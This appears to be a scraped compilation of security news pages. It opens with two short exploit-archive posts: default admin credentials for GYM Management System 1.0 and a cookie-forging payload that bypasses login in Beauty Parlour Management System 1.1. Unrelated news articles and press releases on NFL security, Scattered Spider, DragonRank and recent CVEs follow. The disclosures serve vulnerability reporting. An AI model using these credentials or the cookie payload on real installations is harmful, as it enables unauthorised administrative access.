GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

**GYM Management System 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5ee11f413d4f6dbbb71c2d782424145f8284d96790518d7c0e3923c5bd409844

Download | Favorite | View

**GYM Management System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : GYM Management System 1.0 Insecure Settings Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/gym-management-system-using-php-and-mysql/                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin@gmail.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

GYM Management System 1.0 Insecure Settings

PRESS RELEASE

September 11, 2024—Tampa, Fla— Cyber Florida at USF, in partnership with Cisco and WiCyS (Women in Cybersecurity), proudly hosted the premiere of the Do We Belong Here? documentary last night at the historic Tampa Theatre. The cybersecurity community showed strong support, with more than 200 attendees, including Cyber Florida at USF partners and documentary participants who traveled from out of town, gathering in person to watch the production. The event culminated nearly 18 months of planning, interviews, and relationship-building.

The 90-minute documentary, inspired by the popular Do We Belong Here? podcast, highlights the experiences of women and other underrepresented groups in the cybersecurity industry. Attendees were moved by the inspirational stories of perseverance and success shared by leading female cybersecurity practitioners, executives, and CISOs from top companies and organizations who generously contributed to the project.

While women's participation in the cybersecurity industry is growing, women still only representation about 20-25% of the cybersecurity workforce, according to ISC2. 

“This film represents the heart of what we’re striving for in cybersecurity—diversity, inclusion, and the understanding that everyone belongs here,” said Sarina Gandy, co-producer of the documentary and a key voice in its creation.

Following the screening, a lively Q&A panel with the podcast team took place, featuring:

·    Pam Lindemoen, Chief Information Security Officer Advisor, Cisco

·    Tashya Denose, Reality Labs Security Program Manager, Meta

·    Sarina Gandy, Cyber Communications & Marketing Analyst and Do We Belong Here Podcast Producer, Cyber Florida at USF

·    Rex Wilson, Brand Manager, Cyber Florida at USF

The documentary is available to watch on the Cyber Florida at USF YouTube channel.

Interviews with documentary participants and the podcast team can be arranged with Cyber Outreach Manager Jennifer Kleman, APR, CPRC at \[email protected\].

ABOUT CYBER FLORIDA AT UF  
The Florida Center for Cybersecurity at the University of South Florida, commonly referred to as Cyber Florida at USF, was established by the Florida Legislature in 2014. Its mission is to position Florida as a national leader in cybersecurity through comprehensive education, cutting-edge research, and extensive outreach. Cyber Florida leads various initiatives to inspire and educate both current and future cybersecurity professionals, advance applied research, and enhance cybersecurity awareness and safety of individuals and organizations.

Cybersecurity Community Celebrates Documentary Premiere at Tampa Theatre

As the 104th season of the National Football League kicks off, expect cyberattacks aimed at its customers, players, and arenas.

Source: Illus\_man via Shutterstock

This past weekend, the National Football League kicked off its 2024 season, and while the sport itself has remained the same, mainly — hello, new kicking rules — the technological operations around games and players is constantly evolving, and face increasing cyber threats.

While all companies have a mix of digital and physical assets, sports teams have a unique cocktail of critical assets, especially as data has become increasingly the lifeblood of sports franchises in the NFL. Pervasive Wi-Fi in every stadium and cellular systems that allow, say, concessions to more easily handle demand means there's data to be collected on every aspect of venue operations. Technology also allows connections with fans that extend online, at home, and at stadiums through loyalty programs, biometric checks at venues, and experiences customized by QR codes on every stadium seat.

In addition to information on their fans, NFL teams have real-time data on players, brands that need protecting, and critical infrastructure relied on by arena operations and video broadcasters.

In all, it's a challenging logistical puzzle that requires continuous risk assessment, threat intelligence, and an agile IT team, says Brandon Covert, vice president of IT for the Cleveland Browns (and the area's professional soccer team, the Columbus Crew).

Related:Dark Reading Confidential: Pen Test Arrests, Five Years Later

"I started here 20 years ago, and there wasn't a whole lot of tech in our stadiums — they were all-cash, concrete buildings without a lot of technology," he says. "And now you see there's pervasive Wi-Fi ... and biometric payments and identification. All of these systems are inherently at risk, and we have to manage and mitigate that risk. The challenges \[that come along with\] tech just continue to grow, and get introduced to all areas of our business."

**A Game of Data**

The Cleveland Browns kicked off their game opener at their home stadium, the Huntington Bank Field, on Sept. 8. While the fans were focused on game day, the Browns' information-technology and security groups have been working year-round to ensure that the season remains free of technological glitches and safe from cyberattacks.

One of the thorniest issues is the need to secure increasing volumes of data, be that player data, broadcast feeds, transactional data, or customer information. Every iota of that information has value to cyberattackers, says Covert.

"Our charge being a sports organization — we have a really good bond with our fans and we get a lot of trust from our fans, probably elevated beyond what other industries see with their customers — so we want to be responsible and not be involved in any of those data breaches or loss of fan information, just from a brand and reputation standpoint for us," he says.

And indeed, stolen data on fans and players can appear on the Dark Web; plus, the rapid legalization of sports gambling has added potential monetary losses to the mix, ratcheting up the emotional rollercoaster ride for many fans, says Jake Aurand, counterintelligence lead for Binary Defense, a cyberthreat intelligence firm that counts the Cleveland Browns among its customers.

"Teams have a lot of customer information — whether it's biometric or credit card data from people purchasing game tickets — so we're constantly out there on the darknet looking to see if any of that data has been stolen and is being reposted somewhere on a forum," he says. "But what we're also doing is looking for \[potential threats on the\] physical side."

For instance, among the most major of concerns to operations continues to be ransomware, says Brad Garnett, director and general manager of the Talos Incident Response team at Cisco, which has a partnership with the NFL.

"Ransomware is not going anywhere," he says. "Anything that would impact the integrity of the game — whether that's football, baseball, basketball, or footy — anything that would attack the game's integrity or around infrastructure availability" is a concern for cyber defenders.

Cyberattacks on the operational systems of an arena or stadium could cause a broadcast outage or take an approach as simple as posting a bomb threat on a scoreboard, National Football League CISO Tomás Maldonado said in an interview in June.

"I think a lot of people don't fully appreciate the convergence between cyber physical and the ... ramifications of a cyber event ... they don't usually make that connection right off the bat," said Maldonaldo, who is securing his sixth season with the organization.

**A Game of 1s and 0s**

About half of the threats detected by the company have some cyber-physical component, but the other half are purely about data, Binary Defense's Aurand says. Using the Browns' branding to fool fans into purchasing fake merchandise or just giving up their payment card details are common scams, he says.

Teams should take an active approach to defense, he adds. There are tools for doing just that: CISA and the NFL conduct annual tabletop exercises to workshop incident response, for instance.

"You need a first line of defense put in place, ... looking for those attacks immediately, in real time and throwing them off or identifying them extremely quickly," Aurand says. "And two, you need to stop the attacker from being able to move any further in their attacks."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

NFL Teams Block &amp; Tackle Cyberattacks in a Digital World

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

Posted Sep 13, 2024

Authored by indoushka

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e

Download | Favorite | View

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The default username is admin & The chosen password is user123[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,753)
*   Arbitrary (17,058)
*   BBS (2,859)
*   Bypass (1,912)
*   CGI (1,047)
*   Code Execution (7,889)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,422)
*   DoS (25,235)
*   Encryption (2,394)
*   Exploit (54,198)
*   File Inclusion (4,273)
*   File Upload (1,011)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,270)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,406)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,853)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,711)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,063)
*   Web (10,135)
*   Whitepaper (3,783)
*   x86 (970)
*   XSS (18,289)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,119)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,136)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,775)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

A cyberattack that shut down some of the top casinos in Las Vegas last year quickly became one of the most riveting security stories of 2023: It was the first known case of native English-speaking hackers in the United States and Britain teaming up with ransomware gangs based in Russia. But that made-for-Hollywood narrative has eclipsed a far more hideous trend: Many of these young, Western cybercriminals are also members of fast-growing online groups that exist solely to bully, stalk, harass and extort vulnerable teens into physically harming themselves and others.

The Dark Nexus Between Harm Groups and ‘The Com’

The dangerous ransomware group is targeting financial and insurance sectors using smishing and vishing against IT service desk administrators, cybersecurity teams, and other employees with top-level privileges.

Source: Photo Spirit via Shutterstock

One of the world's most dangerous ransomware groups has been applying its hallmark savvy social engineering to targeted, sophisticated phishing attacks against financial and insurance companies, aiming to steal high-level permissions to cloud-based environments to ultimately deliver ransomware.

Scattered Spider has been using SMS and voice phishing — or smishing and vishing, respectively — attacks to target target high-privileged accounts, such as those of IT service desk administrators and cybersecurity teams. Attackers use the stolen credentials to compromise cloud-based services and ultimately gain access to victim environments for ransomware attacks, according to researchers at EclecticIQ.

"Scattered Spider frequently uses phone-based social engineering techniques … to deceive and manipulate targets, mainly targeting IT service desks and identity administrators," EclecticIQ Threat Intelligence Analyst Arda Büyükkaya wrote in a recent analysis. "The actor often impersonates employees to gain trust and access, manipulate MFA settings, and direct victims to fake login portals."

The attacks are so well-crafted that they often prompt unsuspecting identity administrators in charge of cloud infrastructures to enter credentials for VMware Workspace ONE, an application management and identity access policy platform, so attackers can gain unauthorized access even to accounts protected by multifactor authentication (MFA), Büyükkaya said.

**Cloud Services, SaaS in the Crosshairs**

Other ways Scattered Spider gains persistent access to cloud enviroments is to purchase stolen credentials, execute SIM swaps, and use cloud-native tools. In fact, the threat group is leveraging legitimate features of cloud infrastructure to carry out its nefarious activities, making their operations increasingly difficult to detect and counter, Büyükkaya noted.

"The cybercriminal group abuses legitimate cloud tools such as Azure’s Special Administration Console and Data Factory to remotely execute commands, transfer data, and maintain persistence while avoiding detection," he wrote.

The attacks observed by EclecticIQ targeted cloud-based services like Microsoft Entra ID and Amazon Web Services Elastic Computer Cloud, as well software as a service (SaaS) platforms such as Okta, ServiceNow, Zendesk, and VMware Workspace ONE "by deploying phishing pages that closely mimic single sign-on (SSO) portals," Büyükkaya wrote. These pages are delivered via socially engineered attacks that appear highly convincing — so much so that they even can fool cloud security engineers.

**Spinning a Complex Attack Web**

Scattered Spider, known also by Octo Tempest, made a significant name for itself in the ransomware game rather quickly. The group arrived on the scene in 2022 armed with sophisticated social-engineering techniques, an aptitude for understanding the psychology of Western business minds, and a command of native English — all of which it used as part of its heavy artillery. The group soon became infamous for the massive ransomware attacks on Caesars Palace and MGM Entertainment about a year later.

Scattered Spider teamed with BlackCat/Alphv ransomware early on but became a ransomware-as-a-service (RaaS) affilitate of RansomHub and Qilin earlier this year, after BlackCat/Alphv unceremoniously went dark in March, leaving affiliates in the lurch.

Of late, Scattered Spider has had global law enforcement, including the FBI, hot on its trail, and UK officials recently arrested a 17-year-old from the town of Walsall, UK, in July for his connection to the group.

The attacks outlined by EclecticIQ are the result of analysis conducted between 2023 and the second quarter of 2024, so it's as yet unclear how active Scattered Spider has been since that arrest. However, the research sheds new light on the complex web of attacks the group is capable of spinning to leverage identity compromise to target cloud environments successfully, the researchers noted.

**Defense and Mitigation**

EclecticIQ developed a specific framework outlining the ransomware deployment life cycle to help defenders thwart attacks by detailing the techniques used by the threat actor to infiltrate, persist, and execute ransomware within cloud environments. The accessibility of the cloud makes it a prime target for financially motivated criminals and has been the secret to success for Scattered Spider and other ransomware actors, according to Büyükkaya.

The company made a sweeping set of recommendations for organizations in terms of prevention, detection, and incident response that relate to but are not limited to: secure authentication; monitoring and alerts; hypervisor cloud resource security; firewall and network security; and other key and varied aspects that comprise an enterprise cloud environment.

Other recommendations made specifically focused on Scattered Spider's tendency to use phishing as its key method for initial access, advising organizations to regularly monitor for typosquatting domains. This includes their own organization’s legitimate domains, especially those targeting their own cloud environments.

"Proactively secure these domains to prevent phishing attacks and social engineering tactics," Büyükkaya advised.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Socially Savvy Scattered Spider Traps Cloud Admins in Web

PRESS RELEASE

SAN MATEO, Calif. — Sept. 10, 2024 — QuSecure™, Inc., a leader in post-quantum cryptography (PQC), today announced it has been selected for the United States Army Small Business Innovation Research (SBIR) project titled “Enhanced Post-Quantum Cryptography Suite for Tactical Networks.” 

This SBIR Phase II award further establishes QuSecure as a leading provider of Federal PQC solutions. The contract scope of work is organized to further enhance QuProtect™, the industry’s first end-to-end PQC software-based solution that enables organizations to springboard from cryptographic discovery and non-compliant algorithm detection straight to full quantum-resilience with live encryption management, continuous monitoring, vulnerability and alerting capabilities – all which can be achieved without the need to rip-and-replace current infrastructure.

“This project, in addition to all of our work and traction across all U.S. military branches, further validates that QuSecure is setting the standard for Federal PQC requirements,” said Pete Ford, Head of Federal Operations at QuSecure. “Serving the Government with this important U.S. Army project will provide Crypto Agility, Continuous Cryptographic Inventory (CCI) and Cryptography Orchestration (CO), so the U.S. Government can better protect and manage against classical, AI, and quantum computing threats to cryptography, bringing true resilience to the nation’s most secure encrypted communications for decades to come.”

This award is one of several that QuSecure has won in the past two years to address the most pressing PQC challenges being faced by the U.S. Government.

The recent landmark NIST PQC standards announcement was preceded by extensive government action over the past three years, with the aim of establishing U.S. leadership in protecting the nation’s digital assets form ongoing Harvest Now Decrypt Later (HNDL) attacks. The U.S. Government’s urgency to move toward a quantum safe future has been established with the recent actions taken by Congress and the White House. The Endless Frontiers Act set up a Technology and Innovation Directorate at the National Science Foundation, along with a $100 billion budget to research emerging technologies over five years, including quantum computing and post-quantum cryptography. Additionally, in December 2022 President Biden signed the Quantum Computing Cybersecurity Preparedness Act, a law that requires the Office of Management and Budget to prioritize federal agencies’ adoption of crypto-agile PQC as part of a greater migration effort to Zero Trust Network Access (ZTNA).

QuSecure’s QuProtect software is available now for testing and deployment. This suite offers a comprehensive, end-to-end quantum-security-as-a-service architecture that combines Crypto Agility, Continuous Cryptographic Inventory (CCI) and Cryptography Orchestration (CO) with zero-trust, next-generation quantum-resilient technology, cloud systems, edge devices, and satellite communications to protect networks against today’s cyberattacks and future quantum threats, all with minimal disruption to existing systems.

About QuSecure

QuSecure is a leader in quantum-safe cybersecurity with a mission to use the advent of quantum computing to act as a catalyst to fix the foundation of data security infrastructure. The QuProtect platform requires no quantum technologies to defend against quantum, AI, and classical threats to encryption, and can be purchased through the AWS marketplace or through direct outreach to QuSecure, Accenture, Dell, Cisco, or Carahsoft. QuSecure is proud to have more successful post-quantum cryptography deployments than any other organization in the world, and the technology is currently deployed with government, banking, telecommunications, and infrastructure customers across the globe. QuSecure’s quantum-resilient and crypto-agile solutions provide an easy transition path to quantum resiliency anytime, anywhere, on any device, and across any organization.

The company’s QuProtect solution is the industry’s first cryptographic-agility platform that facilitates the upgrade to PQC and beyond. You can Book a No-Obligation Two Hour CISO Road Mapping Workshop with QuSecure’s experts to get started on your PQC Migration planning and to take the QuProtect Software for a test drive.

US Army Selects QuSecure Solution for 'Enhanced Post-Quantum Cryptography Suite for Tactical Networks' Project

DragonRank, a Chinese-speaking hacking group, has compromised 30+ Windows servers globally. They exploit IIS vulnerabilities to manipulate SEO…

DragonRank, a Chinese-speaking hacking group, has compromised 30+ Windows servers globally. They exploit IIS vulnerabilities to manipulate SEO rankings, distribute scam websites, and spread malware like PlugX and BadIIS.

A Chinese-speaking hacking group, known as “DragonRank,” has been discovered compromising over 30 Windows servers across the globe, including in Thailand, India, Korea, Belgium, Netherlands, and China.

The group’s primary goal is to manipulate search engine crawlers and disrupt the Search Engine Optimization (SEO) of affected sites, ultimately distributing scam websites to unsuspecting users.

One of the DragonRank’s advertisement websites on Google is plagued with malware

****How the Attack Works****

The DragonRank hacking group gains initial access to Windows Internet Information Services (IIS) servers by exploiting vulnerabilities in web application services, such as phpMyAdmin, WordPress, or similar web applications. Once they obtain the ability to execute remote code or upload files on the targeted site, they deploy a web shell like ASPXspy, granting them control over the compromised server.

According to Cisco Talos’ long and technical report shared with Hackread.com ahead of publishing on Tuesday, the group then utilizes the web shell to collect system information and launch malware, including PlugX and BadIIS, as well as credential-harvesting utilities like Mimikatz, PrintNotifyPotato, BadPotato, and GodPotato. They also breach additional Windows IIS servers in the target’s network, either through web shell deployment or by exploiting remote desktop logins using acquired credentials.

For your information, PlugX is a well-known RAT (remote access tool) equipped with modular plugins and property configurations, deployed by various Chinese-speaking cyber threat actors for over ten years. The PlugX configuration in this campaign contains all necessary values and information to properly run the executable.

On the other hand, BadIIS is a malware used to manipulate search engine crawlers and hyperlink jumps. The version of BadIIS detected in this campaign shares similar traits with the one mentioned (PDF) at Black Hat USA 2021, including configuration as an IIS proxy and capabilities for SEO fraud.

Interestingly, researchers also noted that DragonRank operates much like a business, with a commercial website offering their services in both Chinese and English. They engage with clients through platforms like Telegram and QQ, providing tailored SEO fraud services. Their business model includes a cautionary note about transaction confirmations, suggesting they operate with a level of professionalism uncommon in typical cybercrime groups.

Nevertheless, the DragonRank hacking group’s activities are a threat to online security, as they can drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings.

These attacks can harm a company’s online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. Therefore, businesses and IT departments must:

*   **Use Advanced Threat Detection:** Implement solutions that can detect and respond to sophisticated malware like PlugX.
*   **Regularly Update Security Measures:** Ensure all systems, especially web servers, are patched against known vulnerabilities.
*   **Monitor Network Traffic:** Look for unusual outbound connections or changes in server behavior that might indicate malware like BadIIS.
*   **Educate Staff:** Awareness training on cyber threats can help in early detection of phishing or other social engineering attempts.

1.  **Chinese SMS Phishing Group Hits iPhone Users in India Post Scam**
2.  **ValleyRAT Malware Targets Chinese Windows Users in New Attack**
3.  **Chinese Velvet Ant APT Target F5 Devices in Years-Long Espionage**
4.  **“Unfading Sea Haze” Hackers Hit Military Targets in South China Sea**
5.  **Chinese Blackwood APT Deploys NSPX30 Backdoor in Cyberespionage**

Chinese DragonRank Hackers Exploit Global Windows Servers in SEO Fraud

PRESS RELEASE

SAN FRANCISCO, Sept. 10, 2024 /PRNewswire/ -- appCD, the generative infrastructure from code company, today announced the close of its $12.3M seed round, its new identity as StackGen, and the appointment of Arshad Sayyad as Chief Business Officer. The round was led by Thomvest Ventures, with existing investors, FireBolt Ventures, WestWave Capital, and Secure Octane participating. StackGen will utilize the funding to accelerate product development, enhance its go-to-market strategy, and fuel company growth.

"StackGen represents the next evolution of our commitment to revolutionizing infrastructure from code," said Sachin Aggarwal, Co-founder and CEO of StackGen. "The funding will enable us to meet the growing demand from enterprise customers as we continue to deliver on our vision for the future of infrastructure from code. Our new name encapsulates this vision and mission to provide seamless, full-stack infrastructure solutions that enhance the developer experience and enforce industry standards, while embracing generative AI."

As stated in the Gartner® Hype Cycle™ for Platform Engineering, 2024, "The plethora of cloud infrastructure services across multiple cloud providers makes it difficult for platform engineers and developers to manage infrastructure change at the same pace as application code. Therefore, much like software engineers are productive working with higher-level abstractions using object-oriented programming languages with reusable modules, platform engineers seek similar benefits for improving their productivity and simplifying infrastructure delivery. IfC merges infrastructure and application code into a common programming model and a common programming language. IfC improves development and infrastructure agility by enabling infrastructure to change at the same pace as applications — developers focus on business logic and application architecture while infrastructure code is auto-generated based on organizational standards."

"Ensuring governance and consistency in deployments is crucial. StackGen provides default standardization, embedding consistency, security, and policy guardrails seamlessly into cloud deployments for enhanced application reliability," said Arvind Gidwani, CTO, SAP NS2. "StackGen is providing the necessary compliance and cloud automation at scale to help drive digital transformation."

"I am thrilled to be an investor and board member at StackGen, partnering with repeat founder and CEO Sachin Agarwal and his cofounders, Asif Awan and Arshad Sayyad," said Umesh Padval, Managing Director, Thomvest Ventures. "StackGen is revolutionizing the DevOps market with its Infrastructure from Code platform driving 10x productivity gains for DevOps and SecOps. The strong team, massive market opportunity along with differentiated and easy to use technology met the criterion of our thesis driven investments."

The rebranding to StackGen reflects the company's commitment to providing comprehensive infrastructure solutions that span the entire technology stack.

StackGen has expanded its leadership and go-to-market team with the appointment of Arshad Sayyad, former President of Fidelity Investments India and Managing Director at Accenture, Danielle Cook, CNCF Ambassador and ex-Fairwinds and Ondata, and Lauren Rother, ex-HashiCorp. 

StackGen launched its Dev Edition in March, and has already seen significant interest, with developers rapidly signing up to utilize its cutting-edge solutions. This early success underscores the growing demand for innovative infrastructure from code technologies and sets the stage for continued growth and market penetration.

Gartner, Hype Cycle for Platform Engineering, 2024, Manjunath Bhat, Bill Blosen, 19 June 2024

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, HYPE CYCLE are a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

About StackGen  
Founded in 2023 by serial entrepreneurs Sachin Aggarwal and Asif Awan, StackGen (formerly appCD) automatically generates Infrastructure from Code (IfC) based on application code with golden standards applied. Unlike manual Infrastructure as Code (IaC) creation or "golden templates" that quickly become outdated, StackGen generates IaC automatically from the application code, without requiring any code changes, and applies preset standards. StackGen provides seamless, full-stack infrastructure solutions that enhance the developer experience and enforce industry standards. Built for platform engineers and DevOps teams tasked with improving the developer experience and enforcing standards, StackGen reduces software development lifecycle (SDLC) bottlenecks, minimizes liabilities, and eliminates cognitive overload. StackGen is backed by notable venture capital firms Thomvest Ventures, WestWave Capital, FireBolt, and Secure Octane. For further information, please visit www.stackgen.com.

About appCD  
Founded in 2023 by serial entrepreneurs Sachin Aggarwal and Asif Awan, appCD automatically generates Infrastructure from Code (IfC) based on application code with golden standards applied. Unlike manual Infrastructure as Code (IaC) creation or "golden templates" that quickly become outdated, appCD generates IaC automatically from the application code, without requiring any code changes, and applies preset standards. Built for platform engineers and DevOps teams tasked with improving the developer experience and enforcing standards, appCD reduces software development lifecycle (SDLC) bottlenecks, minimizes liabilities, and eliminates cognitive overload. appCD is backed by notable venture capital firms Thomvest Ventures, WestWave Capital, FireBolt, and Secure Octane. For further information, please visit www.appCD.com.

AppCD Closes $12.3M Seed Round and Rebrands to StackGen

CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.

**Vulnerability in Acrobat Reader could lead to remote code execution; Microsoft patches information disclosure issue in Windows API**

Wednesday, September 11, 2024 12:00

Cisco Talos’ Vulnerability Research team discovered two vulnerabilities have been disclosed and fixed over the past few weeks. 

Talos discovered a time-of-check time-of-use vulnerability in Adobe Acrobat Reader, one of the most popular PDF readers currently available, and an information disclosure vulnerability in the Microsoft Windows AllJoyn API. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

**Microsoft AllJoyn API information disclosure vulnerability **

   
The AllJoyn API in some versions of the Microsoft Windows operating system contains an information disclosure vulnerability. 

TALOS-2024-1980 (CVE-2024-38257) could allow an adversary to view uninitialized memory on the targeted machine. 

AllJoyn is a DCOM-like framework for creating method calls or sending one-way signals between applications on a distributed bus. It primarily is used in internet-of-things (IoT) devices to tell the devices to perform certain tasks, like turning lights on or off or reading the temperature of a space. 

Microsoft fixed this issue as part of its monthly security update on Tuesday. For more on Patch Tuesday, read Talos’ blog here. 

CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.   

**Adobe Acrobat Reader annotation object page race condition  **

_Discovered by KPC._ 

Adobe Acrobat Reader, one of the most popular pieces of PDF reading software currently available, contains a time-of-check, use-after-free vulnerability that could trigger memory corruption, and eventually, arbitrary code execution. 

TALOS-2024-2011 (CVE-2024-39420) can be executed if an adversary tricks a targeted user into opening a specially crafted PDF file with malicious JavaScript embedded. This JavaScript could then trigger memory corruption due to a race condition.  

Depending on the memory layout of the process this vulnerability affects, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.

Tag

#cisco